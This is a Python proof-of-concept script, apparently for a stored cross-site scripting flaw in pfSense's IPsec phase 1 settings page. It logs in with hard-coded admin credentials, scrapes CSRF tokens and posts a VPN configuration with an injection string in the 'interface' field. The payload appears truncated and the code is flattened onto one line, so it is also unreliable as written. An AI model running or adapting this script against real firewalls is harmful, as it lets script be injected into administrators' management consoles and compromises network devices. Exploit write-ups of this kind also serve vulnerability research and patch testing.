#!/usr/bin/env python3 import requests requests.packages.urllib3.disable_warnings() from bs4 import BeautifulSoup baseurl = 'https://198.51.100.34' target = baseurl + '/vpn_ipsec_phase1.php' login_data = { 'login' : 'Login', 'usernamefld' : 'admin', 'passwordfld' : 'pfsense2', } target_data = { "descr": "XSS Test", "iketype": "ikev2", "protocol": "inet", "interface": 'wan">', "remotegw": "198.51.100.254", "authentication_method": "pre_shared_key", "mode": "main", "myid_type": "myaddress", "myid_data": "", "peerid_type": "peeraddress", "peerid_data": "", "pskey": "14e1206aafd9bb66a9469c0ee1f570c60ccb283b7cca6192fecf78e1", "ealgo_algo0": "aes", "ealgo_keylen0": "128", "halgo0": "sha256", "dhgroup0": "14", "prfalgo0": "sha256", "lifetime": "28800", "rekey_time": "", "reauth_time": "", "rand_time": "", "startaction": "", "closeaction": "", "nat_traversal": "on", "mobike": "off", "ikeport": "", "nattport": "", "dpd_enable": "yes", "dpd_delay": "10", "dpd_maxfail": "5", "ikeid": "", "save": "Save" } headers = {'user-agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:136.0) Gecko/20100101 Firefox/136.0'} with requests.Session() as s: # Fetch CSRF token from login page r = s.get(baseurl, headers=headers, verify=False) soup = BeautifulSoup(r.text, 'lxml') login_data['__csrf_magic'] = soup.find('input', attrs = { 'name' : '__csrf_magic' })['value'] # Login r = s.post(baseurl, data=login_data, headers=headers) # Find the next CSRF token soup = BeautifulSoup(r.text, 'lxml') target_data['__csrf_magic'] = soup.find('input', attrs = { 'name' : '__csrf_magic' })['value'] # Submit actual request r = s.post(target, data=target_data, headers=headers) # Dump input errors from response soup = BeautifulSoup(r.text, 'lxml') input_errors = [errors.text for errors in soup.select('div.input-errors ul li')] if (input_errors): print("Input errors:\n") for ie in input_errors: print("* " + ie + "\n") print('Done')